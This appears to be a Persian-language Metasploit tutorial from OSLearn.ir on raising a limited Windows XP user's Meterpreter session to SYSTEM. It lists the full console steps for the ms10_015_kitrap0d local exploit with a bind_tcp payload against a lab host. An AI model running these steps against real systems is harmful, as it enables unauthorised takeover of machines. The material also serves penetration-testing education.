منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : Privilege Escalation – win XP

سلام دوستان . قسمت پانزدهم از سری آموزش های متااسپلویت را در پیش رو داریم . همان طور که از عنوان پیداست امروز در مورد بالا بردن سطح دسترسی خودمون صحبت خواهیم کرد . در ویندوز XP یوزر هایی که عضو گروه administrators هستند را به راحتی می توان سطح دسترسی را تا system بالا برد . این کار با دستور getsystem روی اکثر سیستم ها امکان پذیر است اما نکته ی بحث این جاست که اگر یوزر عضو گروه administrators نباشد چه باید کرد ؟ طبیعتا در این زمان به طور عادی دستور getsystem کار نخواهد کرد پس باید از روشی دیگر استفاده کرد .

ابتدا توپولوژی زیر را در نظر بگیرید :

OSLearn.ir_0

همان طور که گفته شد اگر از داخل یوزر limit دستور getsystem را اجرا کنیم , با ارور مواجه می شویم :

meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: Access is denied.

OSLearn.ir_1

طبیعتا در این زمان نمی توان از راه حلی که برای دور زدن این محدودیت در ویندوز 7 گفته شد , استفاده کرد . چرا که یوزر عضو گروه administrator نیست و run as admin بدون داشتن پسورد معنی ندارد .

اما برای حل این مشکل از یک exploit به نام ms10_015_kitrap0d استفاده خواهیم کرد . برای این منظور ابتدا با استفاده از دستور background به محیط کنسول وارد می شویم سپس اکسپلویت ms10_015_kitrap0d را به شکل زیر اجرا می کنیم :

msf exploit(handler) > use exploit/windows/local/ms10_015_kitrap0d

OSLearn.ir_2

در مرحله ی بعد payload مورد نظر و مناسب خود را باید انتخاب کنیم . ما برای این کار از bind_tcp استفاده می کنیم :

msf exploit(ms10_015_kitrap0d) > set payload windows/meterpreter/bind_tcp

در مرحله ی بعد شماره ی نشستی که در قبل ایجاد شده است را وارد می کنیم :

msf exploit(ms10_015_kitrap0d) > set SESSION 1

پورت را به صورت پیش فرض یعنی 4444 رها می کنیم اما می توان rhost را وارد کرد که در همون جا دسترسی گرفته شود و یا این که rhost را ست نکرد تا بعدا خودمون به سیستم قربانی متصل بشیم .

ما در این جا rhost را مشخص می کنیم تا در در ادامه اتصال بعد از exploit کردن تارگت صورت گیرد . برای این منظور :

msf exploit(ms10_015_kitrap0d) > set RHOST 10.10.10.2

در نهایت exploit را به شکل زیر به اجرا در می آوریم :

msf exploit(ms10_015_kitrap0d) > run

OSLearn.ir_3

همان طور که از عکس پیداست در نشستی که ایجاد شده سطح دسترسی تا system افزایش پیدا کرده است .

 

موفق و موید باشید .

 

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها : , , , ,